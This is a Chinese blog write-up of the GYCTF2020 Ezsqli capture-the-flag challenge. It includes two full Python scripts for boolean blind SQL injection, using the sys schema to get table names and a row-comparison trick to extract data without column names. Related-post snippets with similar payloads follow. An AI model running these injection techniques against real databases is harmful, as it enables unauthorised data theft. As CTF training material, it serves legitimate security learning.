[GYCTF2020]Ezsqli(无列名注入)

最新推荐文章于 2025-03-13 10:57:34 发布
最新推荐文章于 2025-03-13 10:57:34 发布
阅读量5.7k 收藏 12
点赞数 8
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43940853/article/details/106164162
版权

[GYCTF2020]Ezsqli

在这里插入图片描述
过滤了好多东西,包括用来查询的information关键词,本上就是考虑盲注了

在这里插入图片描述
在这里插入图片描述
当||后面条件为真时返回Nu1L,为假时返回V&N,这就是判断盲注语句是否成立的关键
在这里插入图片描述
在这里插入图片描述
接下来就可以写脚本判断表名了

import requests
url = 'http://bfd71058-3cf0-4e87-8731-8935a651f051.node3.buuoj.cn/'
payload = '2||ascii(substr((select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),{},1))={}'
result = ''
for j in range(1,500):
    for i in range(32, 127):
        py = payload.format(j,i)
        post_data = {'id': py}
        re = requests.post(url, data=post_data)
        if 'Nu1L' in re.text:
            result += chr(i)
            print(result)
            break

在这里插入图片描述
可以看到存在这两张表,下面就要实现无列名注入

这里用到了ascii位偏移,关于ascii偏移的利用,可以看下面的例子
在这里插入图片描述
可以看到比较两个字符串的大小与字符串的长度是没有关系的,给定两个字符串,会各取两个字符串的首字符ascii码来比较,不等式成立返回1,不等式不成立返回0,换一个角度来说,只会比较一次,也就是首字符
这道题我们利用的就是这个特性,我们首先会从构造一个ascii从32到128的循环,与flag字符一一对比,满足条件返回Nu1L,输出符合条件的ascii对应的字符,也就是找到了flag的第一个字符,以此类推,直到输出所有的flag

import requests
url = 'http://bfd71058-3cf0-4e87-8731-8935a651f051.node3.buuoj.cn/'
def add(flag):
    res = ''
    res += flag
    return res
flag = ''
for i in range(1,200):
    for char in range(32, 127):
        hexchar = add(flag + chr(char))
        payload = '2||((select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh))'.format(hexchar)
        #print(payload)
        data = {'id':payload}
        r = requests.post(url=url, data=data)
        text = r.text
        if 'Nu1L' in r.text:
            flag += chr(char-1)
            print(flag)
            break
有三个需要注意的点

第一个
注意这里的chr(char-1),我们在本地测试来看一下为什么

在这里插入图片描述
当我们匹配flag的时候,一定会先经过匹配到字符相等的情况,这一这个时候返回的是0,对应题目中的V&N,很明显此时的chr(char)并不是我们想要的,我们在输出1(Nu1L)的时候,匹配的是f的下一个字符g,而我们想要的是f,此时chr(char-1)=‘f’,所以这里要用chr(char-1)

第二个
注意循环那里
在这里插入图片描述
这里循环的上限一定要大于等于127,
在这里插入图片描述
这里}的ascii是125,如果取126的话,for循环取到的i的最大值是125,别忘了我们进行了chr(char-1)的操作也就是说最大匹配到ascii为124的字符,不能匹配到},所以这里要扩大上限(其实也没有关系,flag都出来了,自己加上一个}大家也肯定会这么做的,注意这个点就可以了)

第三个
关于payload中的

(select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh)

这里的字段数一定是一一匹配,这里f1ag_1s_h3r3_hhhhh是有两个字段的(可以用select 1|select 1,2|select 1,2,3试试就好),知道是两个字段后,还要注意字段内的一一对应,f1ag_1s_h3r3_hhhhh表中的flag在第二个字段
这样"{}"与flag就实现了对应(f1ag_1s_h3r3_hhhhh表的第一个字段可能是id啥的,跟咱们没有关系了)
在这里插入图片描述

参考

https://www.gem-love.com/ctf/1782.html
buuctf-[GYCTF2020]Ezsqli(异或注入列名)
m0_62094846的博客
05-18 742
尝试过后发现只有1,2可以,3以上会显示错误 尝试一下slq注入,但是输入不是1,2的就会显示错误 尝试异或注入 被过滤了 过滤了for,in在information里也被过滤了 可以用这种方式获得当前数据库,但是information不能用了,也没什么绕过的方式,就不能查表之类的了 id=1^(ascii(substr(database(),1,1))=103)^1 换成 innodb_table_stats 也没用 聊一聊bypass in...
[GYCTF2020] Ezsqli
qq_40327508的博客
11-21 561
考点: 盲注 + 无列名注入 使用异或注入发现页面回显不一样 进一步判断 接下来开始获取列名,但是因为or被过滤使用sys.x$schema_flattened_keys绕过 使用脚本获取表名 import requests url = "http://9c35ab79-5056-4de1-87fe-0418ebc00b82.node3.buuoj.cn/index.php" flag = "" payload = "1^(ascii(substr((select group_concat(tab
sql注入之无列名注数据详解,黑客技术零基础入门到精通实战教程建议收藏!
最新发布
白帽阿叁的博客
03-13 929
主要的就是在无列名的情况下注出具体数据,这里有两种思路原理这里先拿自己环境演示下,可以看到图中有id、user、pass三列,我们假设不知道列名,但我们还是想注出pass这个字段下的hello这条数据假如他后端的语句是这样写的,1是我们传的参数正常的联合查询判断回显位,假如这里回显位是2先来看这条语句,我们会发现列名变成了前面查询的1,2,3,表中所有的数据都被查询出来了,并且会多出来一行数据因为回显位只有一个,我们只需要第三列的数据,所以要这样构造语句这里如果不使用反单引号就会变成这样。
[GYCTF2020]Ezsqli
yym68686
09-03 1208
[GYCTF2020]Ezsqli 打开网页发现有个输入框,随便输入1 or 2,发现or被过滤了,因此尝试fuzz看看,还过滤了哪些sql关键词,我使用的fuzz字典: WEB SQL Fuzz Dict 发现if,or,union,information_schema.tables均被过滤,因为输入2||True和2||False的返回结果不一致所以要用盲注来判断每个字符是什么。对于过滤掉information_schema的题目,注意到MySQL5.7的新特性: 由于performance_sche
buu-[GYCTF2020]Ezsqli
qaq517384的博客
10-10 437
朴实无华一张图片,一个输入框,图片太大就不放了 1是Nu1L,2是V&N,剩下都是“Error Occured When Fetch Result.” fuzz一下,507的都是被过滤了的 过滤了关键的information, 要用到无列名注入,找库名时需要用到用到5.7版本新增的sys库 利用sys库里的三个表都行 schema_table_statistics/schema_table_statistics_with_buffer /x$schema_flattened_keys 表可以找到
BUUCTF:[GYCTF2020]Ezsqli --过滤了information_schem ------ 无列明注入之过滤了union 使用ascii偏移来做
Zero_Adam的博客
03-15 1603
一、自己做: 直截了当的sql注入,先用fuzz字典跑一下: information_schema.table等被过滤了, 而且union 也被过了, 尝试了 || 和&& 等没有过滤,并且strsub,limit等都没有过滤,初步判断盲注应该时可以的。 但是 information_chema等被过滤了,表和 列都查不出来, 二、学到的&&不足: 当information_schema等被过滤的时候,能够查出数据库的名字,但是表明不知道,这时可以用这个来sys.schem
-------已搬运------SQL注入的 过滤 思路 payload 万能密码
Zero_Adam的博客
04-28 2049
目录:一、过滤关键词:1. 过滤 `=` 可用 `like`,`regexp`,`in`来代替:2. 过滤`ascii`,不能用bool盲注了。可用`ord`来代替:3. `,`逗号被过滤了:1. `substr(***,1,1)` 用这个来代替:`substr(***from({})for(1))`2.`limit 0,1` 用这个来代替:`limit 1 offset {}`二、一些小trick1. 关于bool盲注的正确与否三、一些payload:1. 过滤了 空格,但是可以联合查询的bool注
[GYCTF2020]Blacklist
01-21
### GYCTF2020 Blacklist 题目解析 #### Web 应用防火墙(WAF)分析 WAF配置显示,`calc.php`文件中的过滤机制非常严格。具体来说,该PHP脚本会检测并阻止任何包含特定字符的输入请求,这些被屏蔽的字符包括但不限于空格、制表符、回车符、换行符以及常见的SQL注入元字符如单引号(`'`)、双引号(`"`)[^1]。 ```php $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]', '$','\\','^']; foreach ($blacklist as $blackitem) { if (preg_match('/' . $blackitem . '/m', $str)) { die("what are you want to do?"); } } ``` 此段代码表明服务器端对于用户提交的数据进行了严格的预处理,旨在防止恶意攻击者利用特殊字符绕过安全防护措施执行非法操作。 #### SQL 注入尝试方法 尽管存在上述黑名单过滤策略,在实际渗透测试过程中仍然可以采用一些技巧来规避这种防御手段。例如,通过模糊测试(SQL Fuzzing),即向目标应用发送一系列构造好的查询字符串以观察其响应行为模式变化;这种方法有助于识别潜在的安全漏洞所在之处[^2]。 当遇到较为复杂的过滤条件时,则可能需要借助自动化工具编写自定义脚本来持续不断地试探不同类型的payload组合直至找到有效的突破点。 #### 绕过技术探讨 针对此类情况的一种常见解决方案是使用编码转换或者寻找替代表达方式实现相同功能而不触发报警机制。比如: - 利用手动URL编码或其他形式转义避开直接匹配; - 尝试替换某些敏感关键字为同义词或近似结构; - 构建多层嵌套逻辑混淆语法特征减少单一特征命中率。 最终目的是构建能够成功传递给后端解释器但仍保持原有意图的有效载荷(Payload)
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值